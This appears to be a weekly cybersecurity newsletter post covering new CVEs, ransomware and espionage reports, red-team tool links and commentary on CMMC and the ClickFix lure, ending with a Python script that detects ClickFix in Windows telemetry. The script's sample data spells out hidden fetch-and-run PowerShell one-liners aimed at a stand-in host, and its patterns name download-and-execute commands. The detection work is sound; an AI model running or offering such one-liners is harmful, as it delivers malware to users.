![[Image: nDIfEKX.png]](https://i.imgur.com/nDIfEKX.png)
![[Image: O0zT3Ar.png]](https://i.imgur.com/O0zT3Ar.png)
Hi everyone and welcome to the first edition of Gibby’s cybersecurity roundup. Each week, I’ll compile items I’ve found unique or interesting as I came across them in the cybersecurity world. I’ll try to keep things succinct and to the point, but if there is something I find particularly interesting I may deep dive into a topic a bit more.
I'm using some industry terminology here that might not be clear to everyone. If you have questions let me know but in the meantime here's my attempt to make it digestible for everyone:
- TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about TLP, and its classification levels, here.
- Blue Team - The security team focused on defense and detection
- Red Team - The security team focused on attacks and evasion
If you want to see something added here let me know!
![[Image: plvm6YX.png]](https://i.imgur.com/plvm6YX.png)
First, let's get started with this week's new vulnerabilities. While this list is not exhaustive (there were a touch more than 600 new CVEs assigned this week), it does cover some of the more popular and higher-risk ones.
High Risk: Publicly facing VMware ESXi servers are getting smoked with a chain of vulnerabilities that allow hackers to execute code on the hypervisor.
Find the Q&A about this here: https://github.com/vmware/vcf-security-a...-2025-0004
And more information about the vulnerability here: https://support.broadcom.com/web/ecx/sup...es/0/25390
High Risk: Microsoft Patch Tuesday fixes seven zero-days and fifty-seven security flaws.
Six of the seven zero-days were being exploited in the wild (yay!). I won't list all of them, but the critical security updates are:
- CVE-2025-24983 - Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
- CVE-2025-24984 - Windows NTFS Information Disclosure Vulnerability
- CVE-2025-24985 - Windows Fast FAT File System Driver Remote Code Execution Vulnerability
- CVE-2025-24991 - Windows NTFS Information Disclosure Vulnerability
- CVE-2025-24993 - Windows NTFS Remote Code Execution Vulnerability
- CVE-2025-26633 - Microsoft Management Console Security Feature Bypass Vulnerability
- CVE-2025-26630 - Microsoft Access Remote Code Execution Vulnerability
High Risk: Fortinet released a number of patches for a slew of their products, some of which are high severity (again).
Double check your devices here: https://www.fortiguard.com/psirt
High Risk: Hackers are using an old vulnerability to pop Cisco Small Business Routers.
CISA added CVE-2023-20118 to its Known Exploited Vulnerabilities catalog this week, meaning the bad guys are bad-guying a two-year-old vulnerability.
Check out Cisco's Security Advisory here: https://sec.cloudapps.cisco.com/security...n-ej76Pke5
![[Image: TVVm7lW.png]](https://i.imgur.com/TVVm7lW.png)
Researchers have noted a 42% increase in Medusa ransomware attacks from 2023 to 2024, with incidents doubling in early 2025. Medusa, operated as ransomware-as-a-service (RaaS) by the group tracked as Spearwing, employs double-extortion tactics, stealing data as well as encrypting it.
https://www.security.com/threat-intellig...re-attacks
Silk Typhoon, a Chinese espionage group, is now using common IT tools for initial access, exploiting unpatched applications to escalate privileges within targeted organizations. After gaining access, they steal credentials to infiltrate networks and abuse various applications, including Microsoft services, for espionage. Microsoft's threat intelligence has detailed these tactics and offers security solutions and mitigation guidance to defend against these attacks.
https://www.microsoft.com/en-us/security...ply-chain/
Google Cloud CISO Phil Venables applies Jim Collins' flywheel concept to amplifying the effects of our security programs, walking through seven potential security flywheels. Those of you in a leadership role inside or outside cybersecurity should give this a read.
https://www.philvenables.com/post/turnin...y-flywheel
A two-year joint effort by Fortra, Microsoft's Digital Crimes Unit, and Health-ISAC has significantly disrupted ransomware operations by targeting the illicit use of Cobalt Strike and compromised Microsoft software. This campaign achieved an 80% reduction in unauthorized Cobalt Strike copies and seized over 200 malicious domains, drastically shortening the time between detecting and dismantling attacks to under a week in the U.S. and under two weeks globally.
https://www.cobaltstrike.com/blog/update...alt-strike
![[Image: EEG6FZS.png]](https://i.imgur.com/EEG6FZS.png)
FBI Watchdog is a cyber threat intelligence OSINT tool that monitors domain DNS changes in real-time, specifically detecting law enforcement seizures. It alerts users via Telegram and Discord and captures screenshots of seized domains.
https://github.com/DarkWebInformer/FBI_Watchdog
APT-ATTACK-SIMULATION is a compilation of APT simulations (Russia, China, Iran, North Korea) that target many vital sectors, both private and governmental, including written tools, C2 servers, backdoors, exploitation techniques, stagers, bootloaders, and many other tools that attackers might have used in actual attacks.
https://github.com/S3N4T0R-0X0/APT-Attack-Simulation
![[Image: JkUpDIt.png]](https://i.imgur.com/JkUpDIt.png)
StreetCred is a tool created for red teams to test default credentials over SSH and WinRM and then execute scripts on hosts where the login succeeds.
https://github.com/RITRedteam/StreetCred
CaptainCredz is a modular and discreet password-spraying tool inspired by CredMaster, featuring enhancements like a cache mechanism, customizable post-actions, and IP rotation via the IPSpinner proxy.
https://github.com/synacktiv/captaincredz
![[Image: p227pSB.png]](https://i.imgur.com/p227pSB.png)
Here is a spot where I’ll just generally soapbox when I want to.
This week I've had some discussions around two specific issues: one is regulation, specifically CMMC, and the other is a new vector attackers are using that is wildly successful despite it being incredibly obvious that it is bad.
CMMC sucks and it's not going anywhere for 4 more years
Let's first address regulatory compliance, specifically the Cybersecurity Maturity Model Certification (CMMC). For you non-US readers, CMMC is a framework designed to enhance the cybersecurity posture of organizations within the Defense Industrial Base (DIB), a critical sector for national security. It aims to standardize and verify the implementation of cybersecurity best practices across all tiers of the supply chain, from essential support services to advanced research and development.
The anticipated release of the latest CMMC version has been delayed, likely until the next administration. This delay creates a significant challenge: a regulatory vacuum. This vacuum introduces ambiguity, hindering long-term strategic planning and investment in cybersecurity initiatives. Risk owners, from Directors to C-suite executives, are navigating the whiplash of shifting priorities, facing the difficult task of justifying resource allocation amidst regulatory uncertainty. The substantial resource allocation required for CMMC implementation, encompassing not only technology upgrades but also process redesign and workforce training, has been abruptly disrupted. This leaves internal CMMC champions, often IT and security leaders, facing skepticism and uncertainty from other stakeholders who may question the ROI of continued investment.
The resulting impact is a diminished perceived authority of cybersecurity regulations, particularly within the DIB. This uncertainty risks eroding future compliance efforts, potentially leading to continued resistance to essential security measures, such as multi-factor authentication, robust encryption, and continuous monitoring. In a rapidly evolving threat landscape, such resistance can significantly increase an organization's vulnerability.
This situation underscores the critical need for organizations to maintain a proactive and adaptable cybersecurity strategy, regardless of regulatory fluctuations. IT professionals must advocate for a risk-based approach, prioritizing security controls that align with industry best practices and address the most critical threats. This includes fostering a culture of security awareness, implementing robust security architectures, and establishing continuous monitoring and incident response capabilities. It is also essential to maintain open communication with stakeholders, demonstrating the ongoing value of cybersecurity investments and aligning security initiatives with broader business objectives.
TL;DR: CMMC delays create regulatory uncertainty, impacting cybersecurity budgets and adoption. IT pros must advocate for proactive security despite shifting regulations.
Please stop running malicious code willingly
If you're in Incident Response, you've probably seen a rise in this weird attack called 'ClickFix.' If not, buckle up for a wild ride! It's surprisingly simple, and that's why it's working. Here's how it goes:
- Fake Alert: Users get a pop-up or fake error message in their browser, looking like a legit system warning.
- Copy-Paste-Run: They're told to copy some code, right-click the Start button, and paste it into a PowerShell terminal and hit enter.
Yeah, it's working. And here's the kicker: it's hitting a specific group of users. Think back to the Windows 95 days. We used to tinker with everything: backgrounds, sounds, even HTML for our MySpace profiles. We broke stuff, fixed it, learned. Everyone did it.
Then came the iPad generation. They got locked-down devices, limited customization. They never played with command lines, never saw what 'Start > Run > cmd' did. They don't know what PowerShell is, let alone why running random code in it is a huge red flag.
So, when they see a pop-up telling them to run a long code in a terminal, they don't get that 'uh-oh' feeling. It looks normal, or at least not dangerous.
That's how people are getting tricked into running malicious code. They just don't know any better. This whole thing highlights a big problem: our security training isn't keeping up with how users have changed. We've got to show them how to spot red flags and get them asking questions. And, you know, maybe bring back a little bit of that healthy skepticism we all used to have.
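Awareness training is the long-term fix, but the blue team can also catch the pattern above in telemetry. The script below is an added example written for this post, not a tool from the original or from any vendor. It triages two kinds of constructed records: Sysmon-style process-creation events (Image, ParentImage, CommandLine) for the case where the whole pasted one-liner becomes the command line of a console launched from the Start menu, and PowerShell ScriptBlock logging (Event ID 4104) records for the case the post describes, where the user pastes into an already-open console and the process start looks clean. The field names follow Sysmon and Event 4104; every path, host and command in the sample data is invented.

```python
"""Heuristic triage of Windows telemetry for ClickFix-style copy/paste lures.

Added example (not from the original post). Field names follow Sysmon
Event ID 1 and PowerShell Event ID 4104; all sample values are constructed.
"""
import re

# Flags that hide the window or switch off guard rails. A user who is just
# "fixing an error" has no reason to type these.
EVASION = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy|p)\s+bypass|enc(?:odedcommand)?\b)",
    re.I,
)
# Something that pulls content from the network ...
FETCH = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile"
    r"|net\.webclient|start-bitstransfer|curl)\b",
    re.I,
)
# ... and something that runs whatever came back.
EXECUTE = re.compile(r"\b(?:iex|invoke-expression|start-process|mshta)\b", re.I)

POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)\.exe$", re.I)
# Start menu, Run dialog and desktop shortcuts all spawn under explorer.exe,
# which is what a user following on-screen "fix" instructions produces.
INTERACTIVE_PARENTS = {"explorer.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_code(text: str) -> list[str]:
    """Return the suspicious traits present in a command line or script block."""
    traits = []
    if EVASION.search(text):
        traits.append("evasion_flag")
    if FETCH.search(text):
        traits.append("remote_fetch")
    if EXECUTE.search(text):
        traits.append("execute")
    return traits


def classify(event: dict) -> str:
    """Label one record as 'clickfix-like', 'suspicious' or 'benign'."""
    if event.get("EventType") == "ProcessCreate":
        if not POWERSHELL.search(event["Image"]):
            return "benign"
        text = event["CommandLine"]
        interactive = _basename(event["ParentImage"]) in INTERACTIVE_PARENTS
    elif event.get("EventType") == "ScriptBlock":
        text = event["ScriptBlockText"]
        # Event 4104 leaves Path empty when the code was typed or pasted into
        # a console instead of being loaded from a .ps1 file.
        interactive = not event.get("Path")
    else:
        return "benign"

    traits = score_code(text)
    if "remote_fetch" in traits and "execute" in traits:
        # Fetch-and-run from an interactive console is the ClickFix signature;
        # the same cradle under a service parent is worth a look but is often
        # a deployment tool, so it gets a lower label.
        return "clickfix-like" if interactive else "suspicious"
    if "evasion_flag" in traits and interactive:
        return "suspicious"
    return "benign"


def triage(events: list[dict]) -> list[tuple[int, str]]:
    """Return (index, label) for every record that is not benign."""
    findings = []
    for i, event in enumerate(events):
        label = classify(event)
        if label != "benign":
            findings.append((i, label))
    return findings


# Constructed sample telemetry (invented paths, hosts and commands).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr https://lure.invalid/fix)"'},
    # Paste-into-console variant: the process start itself looks clean ...
    {"EventType": "ProcessCreate", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
    # ... and only the script block (no Path) shows the pasted code.
    {"EventType": "ScriptBlock", "Path": "",
     "ScriptBlockText": "iex (New-Object Net.WebClient).DownloadString('https://lure.invalid/fix')"},
    # Admin running a cmdlet from a Start-menu console: benign.
    {"EventType": "ProcessCreate", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -NoProfile -Command "Get-Service -Name Spooler"'},
    # Scheduled script loaded from a file: benign.
    {"EventType": "ScriptBlock", "Path": r"C:\scripts\backup.ps1",
     "ScriptBlockText": r"Compress-Archive -Path C:\data -DestinationPath D:\bak.zip"},
    # Deployment tool pulling an installer under a service parent: suspicious.
    {"EventType": "ProcessCreate", "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": 'pwsh -c "Invoke-WebRequest -Uri https://intranet.invalid/app.msi -OutFile a.msi; Start-Process a.msi"'},
]

if __name__ == "__main__":
    for idx, label in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {label}")
```

The point of splitting the two event types is the caveat in the post itself: when the victim pastes into a console they opened by hand, process-creation telemetry shows nothing but `powershell.exe` under `explorer.exe`, and only ScriptBlock logging reveals the fetch-and-run code. If 4104 logging is not enabled on the fleet, the second sample pair is invisible, so enabling it is the prerequisite for any detection of this variant.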
TL;DR: "ClickFix" attack tricks users into running bad code in PowerShell. They don't know it's dangerous because of how they grew up with computers.
That's it for this week. Thanks for reading, y'all. See you next week.